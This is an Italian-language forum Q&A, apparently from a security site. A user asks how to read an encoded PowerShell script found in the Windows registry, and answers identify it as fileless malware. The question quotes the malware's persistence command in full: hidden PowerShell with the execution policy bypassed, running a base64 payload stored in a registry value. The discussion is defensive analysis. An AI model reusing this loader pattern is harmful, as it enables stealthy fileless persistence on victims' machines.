Come posso leggere il codice sorgente di questo script PowerShell codificato dal registro?

Question

Come posso leggere il codice sorgente di questo script PowerShell codificato dal registro?

#1 da (3 voti)
#2 da (1 voti)

1

Prendo questa riga da ProcessExplorer

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));

Ora sono sicuro che può essere un virus codificato quando leggo questo dal registro:

Google Update REG_SZ
"C:\Users\michael\AppData\Local\Google\Update\GoogleUpdate.exe" /c {BE9473EA-5660-4BF7-91C3-2A2258213EE1} REG_SZ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));

Quindi, ho esportato il valore dei dati LOOTDA dal registro e lo copio come file di testo e carico qui

Quindi, sto cercando un esperto in crittografia e decrittografia per decodificare e decifrare questo tipo di virus per poter leggere il suo codice sorgente e cosa potrebbe essere dannoso per noi!

Grazie!

source-code encryption encoding virus decryption

posta Hackoo 29.03.2016 - 15:36

fonte

2 risposte

1

Non è necessario

any expert in encryption and decryption

Hai bisogno di un decodificatore base64, come questo .

risposta data 29.03.2016 - 15:44

fonte

Leggi altre domande sui tag source-code encryption encoding virus decryption

Aiuta a capire l'infezione da malware Snort Impossibile rilevare i portscan nella LAN

score 3 · Accepted Answer

Questo malware cerca di evitare l'uso di file e processi perché il carico utile risiede nel registro e utilizza i metodi PowerSploit per caricare il codice direttamente in memoria tramite i comandi di PowerShell. Invoke-ReflectivePEInjection lo dà via. Appartiene alla famiglia di malware Terkop .